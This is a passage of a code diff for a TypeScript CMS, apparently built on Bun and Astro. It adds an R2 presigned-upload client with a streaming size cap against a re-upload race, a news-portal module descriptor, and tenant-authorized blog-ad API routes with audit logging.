+        `NEWS_MEDIA_R2_* must never share a bucket or credential with sync-storage's own R2_* vars (Issue #631 architecture doc §2): ${violations.join(", ")}.`
+      );
+    }
+  }
+
+  return { ready: reasons.length === 0, reasons, detail };
+}

--- a/src/modules/news-portal/infrastructure/news-media-r2-client.ts
+++ b/src/modules/news-portal/infrastructure/news-media-r2-client.ts
@@ -1,0 +1,392 @@
+/**
+ * Cloudflare R2 client for the news-media presigned upload flow (Issue #634,
+ * epic `news_portal`). `Bun.S3Client` (Bun-native, S3-API-compatible — R2 is
+ * S3-compatible; no npm AWS/S3 SDK per project constraint), same pattern as
+ * `sync-storage/infrastructure/object-storage-uploader.ts`: circuit breaker
+ * + timeout around every real network call. Deliberately a SEPARATE
+ * provider-circuit-breaker key (`news-media-r2`, not `object-storage`) so an
+ * outage in one bucket/credential pair never trips the breaker for the
+ * other — matching "Keputusan kunci #1" (separate bucket/credentials from
+ * `sync-storage`) in `.claude/skills/awcms-news-portal/SKILL.md`.
+ *
+ * Every method here is called strictly OUTSIDE any DB transaction by its
+ * caller (route handlers under `src/pages/api/v1/media/news-images/`) —
+ * ADR-0006. `presignUploadUrl` is a pure, local HMAC signature computation
+ * (no network round-trip at all), but is still kept out of any `withTenant`/
+ * `sql.begin` block for the same reason: this file is the one and only
+ * place that touches R2 credentials/config, and keeping that discipline
+ * uniform (rather than "only the genuinely-networked calls count") avoids
+ * a future refactor accidentally moving a real network call inside a
+ * transaction by analogy with this one. `listObjects`/`deleteObject`
+ * (Issue #690, epic #679 — R2 lifecycle cleanup & reconciliation job) are no
+ * exception: `scripts/news-media-r2-reconcile.ts` calls both strictly
+ * between (never inside) its per-tenant `withTenant` transactions.
+ *
+ * ## `listObjects`/`deleteObject` (Issue #690)
+ *
+ * Added for `scripts/news-media-r2-reconcile.ts`'s dry-run-first
+ * reconciliation between this table's metadata and the R2 bucket's actual
+ * contents. Same circuit breaker + timeout + truncated-error discipline as
+ * every other method here — a reconciliation run against an R2 outage must
+ * fail safely (report the provider error, skip that tenant/page, never
+ * crash the whole job or block unrelated DB-only work), not retry forever
+ * or throw an unhandled rejection.
+ *
+ * `listObjects` wraps `Bun.S3Client.list()` (a real `ListObjectsV2` call —
+ * paginated via `continuationToken`/`nextContinuationToken`, exactly the S3
+ * REST API shape, verified empirically against a fake local XML-serving
+ * `Bun.serve()` server the same way `tests/unit/news-media-r2-client.test.ts`
+ * already does for `headObject`/`getObject`). `deleteObject` wraps
+ * `Bun.S3Client.file(key).delete()` — real S3/R2 `DELETE` semantics are
+ * already idempotent (deleting an already-absent key succeeds, per the S3
+ * API spec), so this method does not itself special-case "not found" as
+ * success; a genuine HTTP-level failure (5xx, timeout, network error) is
+ * the only path that reports `ok: false`.
+ *
+ * ## `getObject` streaming size cap (security-auditor Critical finding, PR #653 review)
+ *
+ * `getObject` used to be a single `file.arrayBuffer()` call — buffer
+ * everything, THEN let the caller check the size. That is a TOCTOU hole: a
+ * presigned PUT URL is not single-use, so between a `headObject` call
+ * reporting a small size and this `getObject` call actually running, an
+ * attacker can re-PUT a multi-gigabyte object to the SAME key (still
+ * starting with valid image magic bytes, so the MIME sniff would still
+ * pass). `file.arrayBuffer()` would then buffer the ENTIRE object into the
+ * Bun process's memory — a process that serves every tenant — before this
+ * function ever gets a chance to reject it for size. `getObject` now reads
+ * the object as a stream (`S3File.stream()`) and aborts (cancels the
+ * stream) the moment the running total exceeds `maxBytes`, WITHOUT ever
+ * buffering more than `maxBytes` worth of chunks. `headObject`'s own size
+ * check is kept as a cheap fast-path (skip an attempt entirely for an
+ * object R2 already reports as too big), but it is no longer the only line
+ * of defense — the real enforcement now happens during the read itself.
+ */
+import { getProviderCircuitBreaker } from "../../../lib/database/circuit-breaker";
+import { withTimeout } from "../../../lib/integration/timeout";
+
+const PROVIDER_KEY = "news-media-r2";
+const DEFAULT_TIMEOUT_MS = 10_000;
+const MAX_ERROR_MESSAGE_LENGTH = 500;
+
+function truncateError(message: string): string {
+  return message.length > MAX_ERROR_MESSAGE_LENGTH
+    ? `${message.slice(0, MAX_ERROR_MESSAGE_LENGTH)}…`
+    : message;
+}
+
+export type NewsMediaR2ClientConfig = {
+  accountId: string;
+  accessKeyId: string;
+  secretAccessKey: string;
+  bucket: string;
+  /** Override for tests only (a local fake S3-compatible HTTP server — same convention as `object-storage-uploader.ts`'s `R2UploaderConfig.endpoint`). */
+  endpoint?: string;
+  timeoutMs?: number;
+};
+
+export type NewsMediaR2PresignUploadInput = {
+  objectKey: string;
+  mimeType: string;
+  ttlSeconds: number;
+};
+
+export type NewsMediaR2HeadResult =
+  | { ok: true; exists: true; sizeBytes: number }
+  | { ok: true; exists: false }
+  | { ok: false; error: string };
+
+export type NewsMediaR2GetResult =
+  | { ok: true; sizeExceeded: false; bytes: Uint8Array }
+  | { ok: true; sizeExceeded: true }
+  | { ok: false; error: string };
+
+export type NewsMediaR2ObjectSummary = {
+  key: string;
+  /** `undefined` only if R2 itself omits it from the listing response — never expected in practice, but not assumed. */
+  sizeBytes?: number;
+  /** ISO 8601 string, as reported by R2's `LastModified` — used as the age signal for "orphan-in-R2" objects (no matching DB row, so no DB-side timestamp exists), never parsed as a source of truth about DB state. */
+  lastModified?: string;
+};
+
+export type NewsMediaR2ListObjectsInput = {
+  prefix: string;
+  continuationToken?: string;
+  maxKeys?: number;
+};
+
+export type NewsMediaR2ListObjectsResult =
+  | {
+      ok: true;
+      objects: NewsMediaR2ObjectSummary[];
+      isTruncated: boolean;
+      /** Present iff `isTruncated` — pass back in as `continuationToken` for the next page. */
+      nextContinuationToken?: string;
+    }
+  | { ok: false; error: string };
+
+export type NewsMediaR2DeleteResult =
+  { ok: true } | { ok: false; error: string };
+
+export type NewsMediaR2Client = {
+  /**
+   * Presigned `PUT` URL scoped to exactly one server-generated object key,
+   * expiring after `ttlSeconds` — never includes raw R2 credentials, only a
+   * signed URL (`full-online-r2-architecture.md` §8).
+   */
+  presignUploadUrl(input: NewsMediaR2PresignUploadInput): string;
+  /**
+   * Cheap existence + size check (§9 step 1) — a fast-path only. An object
+   * this reports as within-bounds is NOT trusted on its own; `getObject`
+   * re-enforces the size cap itself against the bytes it actually reads,
+   * because this value can be stale by the time `getObject` runs (a
+   * presigned PUT URL can be reused to overwrite the same key).
+   */
+  headObject(objectKey: string): Promise<NewsMediaR2HeadResult>;
+  /**
+   * Full object `GET` (§9 steps 2/5), read as a stream and capped at
+   * `maxBytes` — the read is aborted the moment the running total exceeds
+   * `maxBytes`, without ever buffering more than that much (see this
+   * module's header). Returns `{ ok: true, sizeExceeded: true }` (no
+   * `bytes`) rather than throwing, so a legitimately-oversized/maliciously
+   * swapped object is a normal rejection outcome, not an error path.
+   */
+  getObject(objectKey: string, maxBytes: number): Promise<NewsMediaR2GetResult>;
+  /**
+   * Lists (up to) `input.maxKeys` (R2/S3 default 1000) objects under
+   * `input.prefix` — Issue #690's reconciliation job always scopes this to
+   * a single tenant's own prefix (`news-media/{tenantId}/`), never an
+   * unscoped bucket-wide listing, even though the bucket itself has no
+   * tenant-level access control of its own (R2 credentials are shared
+   * across tenants for this bucket — the object KEY prefix is the only
+   * tenant boundary at the storage layer). Paginate by passing the previous
+   * call's `nextContinuationToken` back in as `input.continuationToken`
+   * until `isTruncated` is `false`.
+   */
+  listObjects(
+    input: NewsMediaR2ListObjectsInput
+  ): Promise<NewsMediaR2ListObjectsResult>;
+  /**
+   * Deletes one object by key. Idempotent by the underlying S3/R2 API's own
+   * semantics (deleting an already-absent key is not an error) — this
+   * method does not add its own "already gone" special case on top.
+   */
+  deleteObject(objectKey: string): Promise<NewsMediaR2DeleteResult>;
+};
+
+/**
+ * Reads `stream` incrementally, accumulating chunks only up to `maxBytes`.
+ * The instant the running total exceeds `maxBytes`, the stream is cancelled
+ * and `null` is returned — chunks already buffered are dropped and no
+ * further reads happen, so memory use is bounded at (at most) `maxBytes`
+ * plus one chunk, never the full object size.
+ */
+// Exported for direct, network-independent unit testing (`readCappedStream`
+// against a synthetic `ReadableStream` proves the abort-before-fully-
+// buffering property deterministically — going only through a real
+// `Bun.S3Client`/loopback HTTP server is not reliable for this, since OS/Bun
+// socket-level read-ahead buffering can race far ahead of this function's
+// own per-chunk consumption on a fast local link, independent of whether
+// this function's cap logic is correct).
+export async function readCappedStream(
+  stream: ReadableStream<Uint8Array>,
+  maxBytes: number
+): Promise<Uint8Array | null> {
+  const reader = stream.getReader();
+  const chunks: Uint8Array[] = [];
+  let total = 0;
+
+  while (true) {
+    const { done, value } = await reader.read();
+
+    if (done) break;
+    if (!value || value.byteLength === 0) continue;
+
+    total += value.byteLength;
+
+    if (total > maxBytes) {
+      await reader
+        .cancel("news-media-r2: object exceeds maxUploadBytes, aborting read")
+        .catch(() => {
+          // Best-effort — the read is already being abandoned either way.
+        });
+      return null;
+    }
+
+    chunks.push(value);
+  }
+
+  const bytes = new Uint8Array(total);
+  let offset = 0;
+  for (const chunk of chunks) {
+    bytes.set(chunk, offset);
+    offset += chunk.byteLength;
+  }
+
+  return bytes;
+}
+
+export function createNewsMediaR2Client(
+  config: NewsMediaR2ClientConfig
+): NewsMediaR2Client {
+  const endpoint =
+    config.endpoint ?? `https://${config.accountId}.r2.cloudflarestorage.com`;
+  const timeoutMs = config.timeoutMs ?? DEFAULT_TIMEOUT_MS;
+  const client = new Bun.S3Client({
+    accessKeyId: config.accessKeyId,
+    secretAccessKey: config.secretAccessKey,
+    bucket: config.bucket,
+    endpoint,
+    region: "auto"
+  });
+  const breaker = getProviderCircuitBreaker(PROVIDER_KEY);
+
+  return {
+    presignUploadUrl({ objectKey, mimeType, ttlSeconds }) {
+      return client.file(objectKey).presign({
+        method: "PUT",
+        expiresIn: ttlSeconds,
+        type: mimeType
+      });
+    },
+
+    async headObject(objectKey) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        const file = client.file(objectKey);
+        const exists = await withTimeout(
+          file.exists(),
+          timeoutMs,
+          `news-media-r2 HEAD exists ${objectKey}`
+        );
+
+        if (!exists) {
+          // A clean "not found" answer is a successful HEAD call, not a
+          // provider malfunction — never trips the breaker.
+          breaker.recordSuccess(new Date());
+          return { ok: true, exists: false };
+        }
+
+        const stat = await withTimeout(
+          file.stat(),
+          timeoutMs,
+          `news-media-r2 HEAD stat ${objectKey}`
+        );
+
+        breaker.recordSuccess(new Date());
+        return { ok: true, exists: true, sizeBytes: stat.size };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    },
+
+    async getObject(objectKey, maxBytes) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        const file = client.file(objectKey);
+        const bytes = await withTimeout(
+          readCappedStream(file.stream(), maxBytes),
+          timeoutMs,
+          `news-media-r2 GET ${objectKey}`
+        );
+
+        breaker.recordSuccess(new Date());
+
+        if (bytes === null) {
+          return { ok: true, sizeExceeded: true };
+        }
+
+        return { ok: true, sizeExceeded: false, bytes };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    },
+
+    async listObjects({ prefix, continuationToken, maxKeys }) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        const response = await withTimeout(
+          client.list({ prefix, continuationToken, maxKeys }),
+          timeoutMs,
+          `news-media-r2 LIST ${prefix}`
+        );
+
+        breaker.recordSuccess(new Date());
+
+        const objects: NewsMediaR2ObjectSummary[] = (
+          response.contents ?? []
+        ).map((entry) => ({
+          key: entry.key,
+          sizeBytes: entry.size,
+          lastModified: entry.lastModified
+        }));
+
+        return {
+          ok: true,
+          objects,
+          isTruncated: response.isTruncated ?? false,
+          nextContinuationToken: response.isTruncated
+            ? response.nextContinuationToken
+            : undefined
+        };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    },
+
+    async deleteObject(objectKey) {
+      const attemptedAt = new Date();
+
+      if (!breaker.canAttempt(attemptedAt)) {
+        return {
+          ok: false,
+          error: "News media R2 circuit breaker is open; skipping attempt."
+        };
+      }
+
+      try {
+        await withTimeout(
+          client.file(objectKey).delete(),
+          timeoutMs,
+          `news-media-r2 DELETE ${objectKey}`
+        );
+
+        breaker.recordSuccess(new Date());
+        return { ok: true };
+      } catch (error) {
+        breaker.recordFailure(new Date());
+        const message = error instanceof Error ? error.message : String(error);
+        return { ok: false, error: truncateError(message) };
+      }
+    }
+  };
+}

--- a/src/modules/news-portal/module.ts
+++ b/src/modules/news-portal/module.ts
@@ -1,0 +1,141 @@
+import { defineModule } from "../_shared/module-contract";
+import { NEWS_MEDIA_PERMISSION_ACTIVITY_CODE } from "./domain/news-media-permissions";
+
+export const newsPortalModule = defineModule({
+  key: "news_portal",
+  name: "News Portal",
+  version: "0.4.0",
+  status: "active",
+  description:
+    "Editorial + media layer for a full-online, R2-only news portal, ported from awcms-mini (epic `news_portal` #631-#642/#649/#681/#690). Ships: (1) a tenant-scoped, R2-only media object registry (`awcms_news_media_objects`, migration 041) with a direct-to-R2 presigned upload flow — `POST /api/v1/media/news-images/upload-sessions` (create), `.../{id}/finalize` (real R2 `GET` + magic-byte MIME sniffing + server-side SHA-256 checksum, NOT `HEAD`-only — see `news-media-r2-verification.ts`), `.../{id}/cancel`; (2) the editorial homepage section composer admin surface — `POST/GET /api/v1/news-portal/homepage-sections`, `PATCH/DELETE .../{id}` (migration 044); (3) R2-only advertisement placement presets — `POST/GET /api/v1/news-portal/ad-placements`, `PATCH/DELETE .../{id}` (migration 046 schema; every row references a verified R2 media object by a real FK `media_object_id`, so R2-only-ness holds by construction); and (4) the `news-media:reconcile` background job (`scripts/news-media-r2-reconcile.ts`, migration 045 orphan lifecycle) reconciling registry metadata against real R2 bucket contents. PORT-TIME DROPS (documented, not silent — same lineage `blog_content`'s port already recorded): (a) the host-resolved `/news/**` public route family (index/detail/category/tag/search/feed/sitemap) is NOT ported — it needs `lib/tenant/public-host-tenant-resolver.ts` + `PUBLIC_TENANT_RESOLUTION_MODE` plumbing from the not-yet-ported `tenant_domain` module; the public render helpers that only backed those routes (`application/homepage-section-composer.ts`, `domain/homepage-section-rendering.ts`, `domain/news-share-config.ts`) are dropped with them. (b) The per-module admin `.astro` pages (`admin/news-portal/homepage-sections.astro`, `admin/news-portal/ad-placements.astro`) are dropped — this base ships no per-module admin UI yet; the `navigation` entries below are descriptor metadata only (same convention `blog_content`'s single `/admin/blog` entry uses — the page it points at does not exist here either). (c) `application/apply-news-portal-preset.ts` and the `news_portal_full_online_r2` module-preset ACTIVATION path are dropped because `module_management`'s preset subsystem (`applyModulePreset`/`MODULE_PRESETS`/`planEnableOrder`) is not ported to this base. The `awcms_news_portal_tenant_state` marker table (migration 043) + its read helper `isFullOnlineR2ModeAppliedForTenant` ARE retained (forward-compatible), but with no writer the `news_media` port's `isFullOnlineR2ModeActiveForTenant` always resolves `false` — identical net behavior to `blog_content`'s prior no-op adapter, while the registry/upload/homepage/ads surfaces above all work independently of that mode. This module PROVIDES the `news_media` capability (`_shared/ports/news-media-port.ts`, implemented by `application/news-media-port-adapter.ts`) — now the REAL adapter wired into `blog_content`'s write/render composition roots (route handlers + `blog:publish:scheduled` worker), replacing that module's port-time no-op — and CONSUMES `blog_content`'s `public_content` capability (`_shared/ports/public-content-port.ts`) for homepage-section reference validation, wired at the composition root, never a raw cross-module import inside either module's `application`/`domain` tree.",
+  // `module_management` + `logging` are foundation modules that are never
+  // disabled per-tenant, so declaring them does not arm the reverse-dependency
+  // guard against any optional business module; both keep `modules:dag:check`
+  // acyclic. (`blog_content`/`tenant_domain`/`visitor_analytics` are
+  // deliberately NOT dependencies — the capability wiring below documents the
+  // `blog_content` relationship without a lifecycle-ordering edge.)
+  dependencies: [
+    "tenant_admin",
+    "identity_access",
+    "module_management",
+    "logging"
+  ],
+  type: "domain",
+  // This module PROVIDES the `news_media` capability
+  // (`_shared/ports/news-media-port.ts`, implemented by
+  // `application/news-media-port-adapter.ts`) that `blog_content` consumes
+  // for R2-only-mode media validation, and CONSUMES `blog_content`'s
+  // `public_content` capability (`_shared/ports/public-content-port.ts`) for
+  // `application/homepage-section-reference-validation.ts` (validating that a
+  // homepage section's referenced posts/categories exist and are public-safe
+  // at admin write time). See `blog_content/module.ts`'s mirror note.
+  // `public_content` is NOT optional here — every homepage section type is
+  // fundamentally built on `blog_content` data, unlike `blog_content`'s
+  // optional consumption of `news_media`.
+  capabilities: {
+    provides: ["news_media"],
+    consumes: [{ capability: "public_content", providedBy: "blog_content" }]
+  },
+  api: {
+    openApiPath: "openapi/awcms-public-api.openapi.yaml",
+    basePath: "/api/v1/media/news-images"
+  },
+  navigation: [
+    {
+      labelKey: "admin.layout.nav_news_portal_homepage_sections",
+      path: "/admin/news-portal/homepage-sections",
+      order: 80,
+      requiredPermission: "news_portal.homepage_sections.read"
+    },
+    {
+      labelKey: "admin.layout.nav_news_portal_ad_placements",
+      path: "/admin/news-portal/ad-placements",
+      order: 81,
+      requiredPermission: "news_portal.ad_placements.read"
+    }
+  ],
+  permissions: [
+    {
+      activityCode: "homepage_sections",
+      action: "read",
+      description: "Read editorial homepage section configuration"
+    },
+    {
+      activityCode: "homepage_sections",
+      action: "configure",
+      description:
+        "Create, update, reorder, enable/disable, or delete editorial homepage sections"
+    },
+    {
+      activityCode: "ad_placements",
+      action: "read",
+      description: "Read news portal advertisement placement configuration"
+    },
+    {
+      activityCode: "ad_placements",
+      action: "configure",
+      description:
+        "Create, update, enable/disable, or delete news portal advertisement placements"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "create",
+      description:
+        "Create a pending news media object / start a presigned upload session"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "read",
+      description: "Read news media object metadata"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "verify",
+      description: "Finalize/verify an uploaded news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "attach",
+      description: "Attach a verified news media object to an owning resource"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "detach",
+      description: "Detach a news media object from its owning resource"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "delete",
+      description: "Soft delete news media object metadata"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "restore",
+      description: "Restore a soft-deleted news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "purge",
+      description: "Hard purge an already soft-deleted news media object"
+    },
+    {
+      activityCode: NEWS_MEDIA_PERMISSION_ACTIVITY_CODE,
+      action: "cancel",
+      description: "Cancel one's own not-yet-uploaded news media upload session"
+    }
+  ],
+  // Issue #690 (epic #679, platform-hardening): the first background job
+  // this module declares (`settings`/`health` remain undeclared — still no
+  // per-tenant setting or health check for this module specifically).
+  jobs: [
+    {
+      command: "bun run news-media:reconcile",
+      purpose:
+        "Reconcile awcms_news_media_objects metadata against the real R2 bucket contents; clean up expired pending uploads and grace-period-expired orphans in bounded, race-safe batches (dry-run supported).",
+      recommendedSchedule: "Daily via cron/systemd timer.",
+      environmentNotes:
+        'No-op when NEWS_MEDIA_R2_ENABLED is not "true". Requires real network egress to the Cloudflare R2 API in addition to PostgreSQL — not a pure database operation.',
+      safeInOfflineLan: false
+    }
+  ]
+});

--- a/src/pages/api/v1/blog/ads/[id].ts
+++ b/src/pages/api/v1/blog/ads/[id].ts
@@ -1,0 +1,232 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  fetchAdById,
+  fetchAdPlacements,
+  softDeleteAd,
+  syncAdPlacements,
+  updateAd
+} from "../../../../../modules/blog-content/application/ads-directory";
+import {
+  validateAdPlacementsInput,
+  validateUpdateAdInput,
+  type AdPlacementInput
+} from "../../../../../modules/blog-content/domain/ad-policy";
+import { validateDeleteReasonInput } from "../../../../../modules/blog-content/domain/content-validation";
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "ads",
+  action: "configure" as const
+};
+
+/** `PATCH /api/v1/blog/ads/{id}` (Issue #542). `placements` (full replace) may be sent independently of the other ad fields. */
+export const PATCH: APIRoute = async ({ request, params, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Ad id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const validation = validateUpdateAdInput(body);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Ad update is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  let placements: AdPlacementInput[] | undefined;
+
+  if (body && body.placements !== undefined) {
+    const placementsResult = validateAdPlacementsInput(body.placements);
+
+    if (!placementsResult.valid) {
+      return fail(
+        400,
+        "VALIDATION_ERROR",
+        "Ad placements are invalid.",
+        {},
+        placementsResult.errors
+      );
+    }
+
+    placements = placementsResult.value;
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const updated = await updateAd(tx, tenantId, id, input);
+
+    if (!updated) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Ad not found.");
+    }
+
+    const currentPlacements = placements
+      ? await syncAdPlacements(tx, tenantId, id, placements)
+      : await fetchAdPlacements(tx, tenantId, id);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.ad.updated",
+      resourceType: "blog_ad",
+      resourceId: id,
+      severity: "info",
+      message: `Blog ad updated: ${updated.name}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.ad.updated", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      adId: id
+    });
+
+    return ok({ ...updated, placements: currentPlacements });
+  });
+};
+
+/** `DELETE /api/v1/blog/ads/{id}` (Issue #542) — soft-delete. `reason` required. */
+export const DELETE: APIRoute = async ({
+  request,
+  params,
+  cookies,
+  locals
+}) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+  const id = params.id;
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!id) {
+    return fail(400, "VALIDATION_ERROR", "Ad id is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const validation = validateDeleteReasonInput(bodyRead.value);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "reason is required.",
+      {},
+      validation.errors
+    );
+  }
+
+  const { reason } = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const existing = await fetchAdById(tx, tenantId, id);
+
+    if (!existing) {
+      return fail(404, "RESOURCE_NOT_FOUND", "Ad not found.");
+    }
+
+    await softDeleteAd(tx, tenantId, auth.context.tenantUserId, id, reason);
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.ad.deleted",
+      resourceType: "blog_ad",
+      resourceId: id,
+      severity: "warning",
+      message: "Blog ad deleted.",
+      attributes: { reason },
+      correlationId
+    });
+
+    log("info", "blog-content.ad.deleted", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      adId: id
+    });
+
+    return ok({ id, deleted: true });
+  });
+};

--- a/src/pages/api/v1/blog/ads/index.ts
+++ b/src/pages/api/v1/blog/ads/index.ts
@@ -1,0 +1,166 @@
+import type { APIRoute } from "astro";
+
+import { fail, ok } from "../../../../../modules/_shared/api-response";
+import { getDatabaseClient } from "../../../../../lib/database/client";
+import { withTenant } from "../../../../../lib/database/tenant-context";
+import {
+  authorizeInTransaction,
+  resolveAuthInputs
+} from "../../../../../modules/identity-access/application/access-guard";
+import { hashSessionToken } from "../../../../../lib/auth/session-token";
+import {
+  bodyTooLargeResponse,
+  readJsonBody
+} from "../../../../../lib/security/request-body-limit";
+import { log } from "../../../../../lib/logging/logger";
+import { recordAuditEvent } from "../../../../../modules/logging/application/audit-log";
+import {
+  createAd,
+  listAds,
+  syncAdPlacements
+} from "../../../../../modules/blog-content/application/ads-directory";
+import {
+  validateAdPlacementsInput,
+  validateCreateAdInput
+} from "../../../../../modules/blog-content/domain/ad-policy";
+
+const READ_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "ads",
+  action: "read" as const
+};
+
+const CONFIGURE_GUARD = {
+  moduleKey: "blog_content",
+  activityCode: "ads",
+  action: "configure" as const
+};
+
+/** `GET /api/v1/blog/ads` (Issue #542) — list this tenant's non-deleted ads. */
+export const GET: APIRoute = async ({ request, cookies }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      READ_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const ads = await listAds(tx, tenantId);
+
+    return ok({ ads });
+  });
+};
+
+/** `POST /api/v1/blog/ads` (Issue #542) — create an ad, optionally with its initial `placements`. Not idempotent. */
+export const POST: APIRoute = async ({ request, cookies, locals }) => {
+  const { tenantId, token } = resolveAuthInputs(request, cookies);
+
+  if (!tenantId) {
+    return fail(400, "TENANT_REQUIRED", "Tenant header is required.");
+  }
+
+  if (!token) {
+    return fail(401, "AUTH_REQUIRED", "Authentication required.");
+  }
+
+  const bodyRead = await readJsonBody<Record<string, unknown>>(request);
+
+  if (bodyRead.tooLarge) {
+    return bodyTooLargeResponse(bodyRead.limitBytes);
+  }
+
+  const body = bodyRead.value;
+  const validation = validateCreateAdInput(body);
+
+  if (!validation.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Ad is invalid.",
+      {},
+      validation.errors
+    );
+  }
+
+  const placementsInput = (body ?? {}).placements ?? [];
+  const placementsResult = validateAdPlacementsInput(placementsInput);
+
+  if (!placementsResult.valid) {
+    return fail(
+      400,
+      "VALIDATION_ERROR",
+      "Ad placements are invalid.",
+      {},
+      placementsResult.errors
+    );
+  }
+
+  const input = validation.value;
+  const sql = getDatabaseClient();
+  const tokenHash = hashSessionToken(token);
+  const now = new Date();
+  const correlationId = locals.correlationId;
+
+  return withTenant(sql, tenantId, async (tx) => {
+    const auth = await authorizeInTransaction(
+      tx,
+      tenantId,
+      tokenHash,
+      now,
+      CONFIGURE_GUARD
+    );
+
+    if (!auth.allowed) {
+      return auth.denied;
+    }
+
+    const ad = await createAd(tx, tenantId, input);
+    const placements = await syncAdPlacements(
+      tx,
+      tenantId,
+      ad.id,
+      placementsResult.value
+    );
+
+    await recordAuditEvent(tx, {
+      tenantId,
+      actorTenantUserId: auth.context.tenantUserId,
+      moduleKey: "blog_content",
+      action: "blog.ad.created",
+      resourceType: "blog_ad",
+      resourceId: ad.id,
+      severity: "info",
+      message: `Blog ad created: ${ad.name}.`,
+      correlationId
+    });
+
+    log("info", "blog-content.ad.created", {
+      correlationId,
+      tenantId,
+      moduleKey: "blog_content",
+      adId: ad.id
+    });
+
